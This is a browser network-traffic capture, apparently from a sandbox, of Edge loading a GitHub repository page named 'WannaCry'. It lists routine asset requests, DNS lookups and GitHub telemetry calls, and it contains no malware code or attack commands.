accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 107757
x-served-by: cache-iad-kcgs7200025-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 2, 4683
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a3c4c5c53ba1fdee60d34086b9b1313765a3e76c
content-length: 3179
GET

https://github.githubassets.com/assets/chunk-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_stack-tra-600f89-049e7dac85f6.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_stack-tra-600f89-049e7dac85f6.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 16 Oct 2024 14:41:15 GMT
etag: "0x8DCEDF096BC754D"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 25521
x-served-by: cache-iad-kcgs7200056-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 34, 1487
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a6506545360eb48dd8bb631176e71835f188bd5a
content-length: 5613
GET

https://github.githubassets.com/assets/chunk-ui_packages_webauthn-get-element_webauthn-get-element_ts-eba7ee3409f2.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-ui_packages_webauthn-get-element_webauthn-get-element_ts-eba7ee3409f2.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
content-md5: VvBwy4NqnxK52DsiAv8DSA==
last-modified: Wed, 14 Aug 2024 19:54:00 GMT
etag: "0x8DCBC9AD72D85A2"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 3249212
x-served-by: cache-iad-kcgs7200147-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 1074, 66440
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 24fe6cdd992f2d910e8244e58cd19a6ef9cccde3
content-length: 2790
GET

https://github.githubassets.com/assets/chunk-ui_packages_code-view-shared_components_files-search_FileResultsList_tsx-71c1ca2bf425.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-ui_packages_code-view-shared_components_files-search_FileResultsList_tsx-71c1ca2bf425.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 08 Oct 2024 13:57:06 GMT
etag: "0x8DCE7A118B477C8"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 800237
x-served-by: cache-iad-kjyo7100057-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 10, 13172
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: fa552248420eea7c64764863eb09a036e908f701
content-length: 5052
GET

https://github.githubassets.com/assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-d06d275cbddc.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-d06d275cbddc.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
content-md5: Sl55SYaMImCtL5+l+k36Gw==
last-modified: Wed, 14 Aug 2024 19:53:22 GMT
etag: "0x8DCBC9AC0F88440"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:24 GMT
age: 3835286
x-served-by: cache-iad-kcgs7200110-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 1293, 64539
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 49e842a453a66e6393d7679e510dbc653a7aa28f
content-length: 9412
GET

https://github.githubassets.com/assets/chunk-ui_packages_show-dialog-on-load-element_show-dialog-on-load-element_ts-eea3fdb40121.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/chunk-ui_packages_show-dialog-on-load-element_show-dialog-on-load-element_ts-eea3fdb40121.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 05 Aug 2024 19:46:35 GMT
etag: 0x8DCB58750874F78
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:24 GMT
age: 5034287
x-served-by: cache-iad-kjyo7100172-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 42, 9184
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 796e40e29774b540ddf248dae3ec4a7671ef10fa
content-length: 548
DNS

user-images.githubusercontent.com

msedge.exe

Remote address:

8.8.8.8:53

Request

user-images.githubusercontent.com

IN A

Response

user-images.githubusercontent.com

IN A

185.199.111.133

user-images.githubusercontent.com

IN A

185.199.108.133

user-images.githubusercontent.com

IN A

185.199.109.133

user-images.githubusercontent.com

IN A

185.199.110.133
DNS

133.111.199.185.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

133.111.199.185.in-addr.arpa

IN PTR

Response

133.111.199.185.in-addr.arpa

IN PTR

cdn-185-199-111-133githubcom
DNS

api.github.com

msedge.exe

Remote address:

8.8.8.8:53

Request

api.github.com

IN A

Response

api.github.com

IN A

20.26.156.210
DNS

raw.githubusercontent.com

msedge.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.109.133
DNS

config.edge.skype.com

msedge.exe

Remote address:

8.8.8.8:53

Request

config.edge.skype.com

IN A

Response

config.edge.skype.com

IN CNAME

config.edge.skype.com.trafficmanager.net

config.edge.skype.com.trafficmanager.net

IN CNAME

l-0007.config.skype.com

l-0007.config.skype.com

IN CNAME

config-edge-skype.l-0007.l-msedge.net

config-edge-skype.l-0007.l-msedge.net

IN CNAME

l-0007.l-msedge.net

l-0007.l-msedge.net

IN A

13.107.42.16
DNS

19.89.109.52.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

19.89.109.52.in-addr.arpa

IN PTR

Response
DNS

self.events.data.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

self.events.data.microsoft.com

IN A

Response

self.events.data.microsoft.com

IN CNAME

self-events-data.trafficmanager.net

self-events-data.trafficmanager.net

IN CNAME

onedscolprdweu05.westeurope.cloudapp.azure.com

onedscolprdweu05.westeurope.cloudapp.azure.com

IN A

52.178.17.3
DNS

r.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

r.bing.com

IN A

Response

r.bing.com

IN CNAME

p-static.bing.trafficmanager.net

p-static.bing.trafficmanager.net

IN CNAME

r.bing.com.edgekey.net

r.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

92.123.128.136

e86303.dscx.akamaiedge.net

IN A

92.123.128.140

e86303.dscx.akamaiedge.net

IN A

92.123.128.144

e86303.dscx.akamaiedge.net

IN A

92.123.128.141

e86303.dscx.akamaiedge.net

IN A

92.123.128.146

e86303.dscx.akamaiedge.net

IN A

92.123.128.138

e86303.dscx.akamaiedge.net

IN A

92.123.128.134

e86303.dscx.akamaiedge.net

IN A

92.123.128.137

e86303.dscx.akamaiedge.net

IN A

92.123.128.135
DNS

222.197.79.204.in-addr.arpa

msedge.exe

Remote address:

8.8.8.8:53

Request

222.197.79.204.in-addr.arpa

IN PTR

Response
GET

https://camo.githubusercontent.com/23b6c2b3787caef9c6d3766ccd509ed433ae8532885416fdaeb4a74045b5fe47/68747470733a2f2f7777772e6865616c74686361726569746e6577732e636f6d2f73697465732f6869746e2f66696c65732f57616e6e614372792d6c6f636b73637265656e3731325f302e706e67

msedge.exe

Remote address:

185.199.111.133:443

Request

GET /23b6c2b3787caef9c6d3766ccd509ed433ae8532885416fdaeb4a74045b5fe47/68747470733a2f2f7777772e6865616c74686361726569746e6577732e636f6d2f73697465732f6869746e2f66696c65732f57616e6e614372792d6c6f636b73637265656e3731325f302e706e67 HTTP/2.0
host: camo.githubusercontent.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: max-age=1209600
content-security-policy: default-src 'none'; img-src data:; style-src 'unsafe-inline'
content-type: image/png
expires: Thu, 22 Aug 2024 12:48:26 GMT
last-modified: Thu, 18 May 2017 17:07:03 GMT
server: github-camo (c20f7b3f)
strict-transport-security: max-age=31536000; includeSubDomains
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 6F77:1DB46D:6E21DC:86B834:66DA7F6A
accept-ranges: bytes
age: 210514
date: Thu, 17 Oct 2024 21:04:23 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600032-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1729199063.033576,VS0,VE1
vary: Fastly-SSL,Fastly-SSL
x-fastly-request-id: c883bd99528a75e5981b6ad1c38b55b94b5cd5dd
timing-allow-origin: https://github.com
content-length: 298596
GET

https://github.githubassets.com/favicons/favicon.svg

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /favicons/favicon.svg HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: image/png
content-md5: YDrNCDxuYozaAYS2sPzvIQ==
last-modified: Wed, 14 Aug 2024 19:49:39 GMT
etag: "0x8DCBC9A3C0EF02F"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:24 GMT
age: 2951433
x-served-by: cache-iad-kiad7000023-IAD, cache-lcy-eglc8600068-LCY
x-cache: HIT, HIT
x-cache-hits: 2652, 25417
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 5e6656cd7020861de6793e7e965af86581f5b59a
content-length: 14426
GET

https://github.githubassets.com/assets/apple-touch-icon-144x144-b882e354c005.png

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/apple-touch-icon-144x144-b882e354c005.png HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: image/svg+xml
content-md5: bYAvaN8MCaSZfP0o7q/Z/w==
last-modified: Wed, 14 Aug 2024 19:18:58 GMT
etag: "0x8DCBC95F2647EDF"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:24 GMT
age: 150
x-served-by: cache-iad-kiad7000081-IAD, cache-lcy-eglc8600068-LCY
x-cache: HIT, HIT
x-cache-hits: 1523704, 5
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 6ff3d617e0f535476b809b74286f37c198498558
content-length: 959
GET

https://github.githubassets.com/favicons/favicon.png

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /favicons/favicon.png HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: image/png
content-md5: NG4JRxNi8pB1EKMYEhKc0g==
last-modified: Wed, 14 Aug 2024 19:18:46 GMT
etag: "0x8DCBC95EB57AC96"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:24 GMT
age: 191
x-served-by: cache-iad-kiad7000070-IAD, cache-lcy-eglc8600068-LCY
x-cache: HIT, HIT
x-cache-hits: 4347480, 1
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b76d55c5d03dccdaf3d19ce05250c5a3324c4648
content-length: 958
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.112.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1042
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light

Response

HTTP/2.0 204

date: Thu, 17 Oct 2024 21:04:24 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002460
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: C4DF:5CD31:206F38:29DF52:67117BD8
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.112.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1351
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Thu, 17 Oct 2024 21:04:24 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003499
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: C4DF:5CD31:206F39:29DF53:67117BD8
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.112.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1315
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Thu, 17 Oct 2024 21:04:33 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.001786
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: C4DF:5CD31:207D14:29F157:67117BD8
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.112.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1499
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry?tab=readme-ov-file
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Thu, 17 Oct 2024 21:04:44 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003149
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: C4DF:5CD31:208D3A:2A063B:67117BE1
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.112.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1415
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry?tab=readme-ov-file
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Thu, 17 Oct 2024 21:05:02 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.004156
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: C4DF:5CD31:20AC14:2A2D87:67117BEC
POST

https://api.github.com/_private/browser/stats

msedge.exe

Remote address:

20.26.156.210:443

Request

POST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 5843
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

date: Thu, 17 Oct 2024 21:04:24 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1729202664
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
server: github.com
x-github-request-id: C4E2:29476D:131B88:145BF9:67117BD8
POST

https://api.github.com/_private/browser/stats

msedge.exe

Remote address:

20.26.156.210:443

Request

POST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 285
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

date: Thu, 17 Oct 2024 21:04:34 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1729202674
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
server: github.com
x-github-request-id: C4E2:29476D:131F48:145FFB:67117BD8
POST

https://api.github.com/_private/browser/stats

msedge.exe

Remote address:

20.26.156.210:443

Request

POST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 689
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry?tab=readme-ov-file
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

date: Thu, 17 Oct 2024 21:04:44 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1729202684
